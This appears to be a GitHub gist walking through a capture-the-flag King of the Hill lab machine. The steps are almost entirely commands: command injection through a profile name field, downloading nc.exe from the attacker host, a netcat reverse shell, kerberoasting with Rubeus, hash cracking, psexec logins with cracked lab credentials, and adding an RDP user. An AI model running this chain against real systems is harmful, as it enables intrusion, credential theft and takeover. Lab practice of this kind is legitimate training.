Skip to content

Instantly share code, notes, and snippets.

@comradecheese

comradecheese/H1MediumKOTH.md

Last active November 2, 2021 05:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save comradecheese/dbf38607460a03fdd93b58767a598d3a to your computer and use it in GitHub Desktop.
Save comradecheese/dbf38607460a03fdd93b58767a598d3a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
H1MediumKOTH.md

H1:Medium KOTH

Enumeration

# basic port scan
sudo nmap -Pn -sV -sC -T5 <target-ip>

Port 80 is interesting. Create an account and navigate to profile. Open dev tools and block script.js URL. Reload page.

Attack

Use change name field for remote command execution.

# reverse shell listener (on attack machine)
nc -lvnp 9001

# upload nc executable (name field)
cheese | powershell curl <attack-ip>:8000/nc.exe -o nc.exe

# engage reverse shell (name field)
cheese | nc.exe <attack-ip> 9001 -e powershell

Windows shell foothold established.

# upload Ghostpack-CompiledBinaris/Rubeus.exe
curl <attack-ip>:<port>/Rubeus.exe -o Rubeus.exe

# dump kerberoast user hash
.\Rubeus.exe kerberoast /nowrap

# crack hash 
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs hash

Privilege Escalation

# deploy impacket
python3 psexec.py troy.thm/achilles:winniethepooh@<target-ip>

Successfully elevated to NT AUTHORITY\SYSTEM.

# become king
cd C:\
echo <name> > king.txt

# find flags
dir flag*.txt /s 
type Users\<user>\Desktop\flag.txt

# setup rdp and access machine
net localgroup "Remote Desktop Users" achilles /add
net user achilles <newpassword>
xfreerdp /u:achilles /p:newpassword /v:<target-IP> /size:90%
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment